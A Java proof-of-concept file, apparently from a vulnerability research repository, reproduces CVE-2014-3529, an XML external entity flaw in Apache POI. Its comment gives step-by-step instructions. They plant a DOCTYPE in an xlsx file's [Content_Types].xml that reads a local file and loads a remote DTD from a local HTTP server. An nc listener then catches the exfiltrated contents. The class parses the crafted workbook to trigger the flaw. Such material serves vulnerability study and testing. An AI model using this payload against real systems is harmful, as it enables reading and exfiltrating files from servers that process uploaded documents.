package com.threedr3am.bug.poi;

import java.io.IOException;
import org.apache.poi.EncryptedDocumentException;
import org.apache.poi.ss.usermodel.Sheet;
import org.apache.poi.ss.usermodel.Workbook;
import org.apache.poi.ss.usermodel.WorkbookFactory;

/**
 * 1. unzip test.xlsx
 * 2. vim [Content_Types].xml，line-2 insert (  <!DOCTYPE note [<!ENTITY % file SYSTEM "file:///tmp/flag"><!ENTITY % remote SYSTEM "http://127.0.0.1:23234/xxe.dtd">%remote;%all;]><root>&send;</root>  )
 * 3. zip -r 0 test.xlsx ./*
 * 4. echo "threedr3am" > /tmp/flag
 * 5. nc -lvvp 23235
 * 6. cp xxe.dtd /tmp/poi/xxe.dtd & cd /tmp/poi/ & python -m SimpleHTTPServer 23234
 *
 * @author threedr3am
 */
public class CVE_2014_3529 {

    public static void main(String[] args)
        throws IOException, EncryptedDocumentException, org.apache.poi.openxml4j.exceptions.InvalidFormatException {
        Workbook wb1 = WorkbookFactory.create(CVE_2014_3529.class.getClassLoader().getResourceAsStream("test.xlsx"));
        Sheet sheet = wb1.getSheetAt(0);
        System.out.println(sheet.getLastRowNum());
    }
}
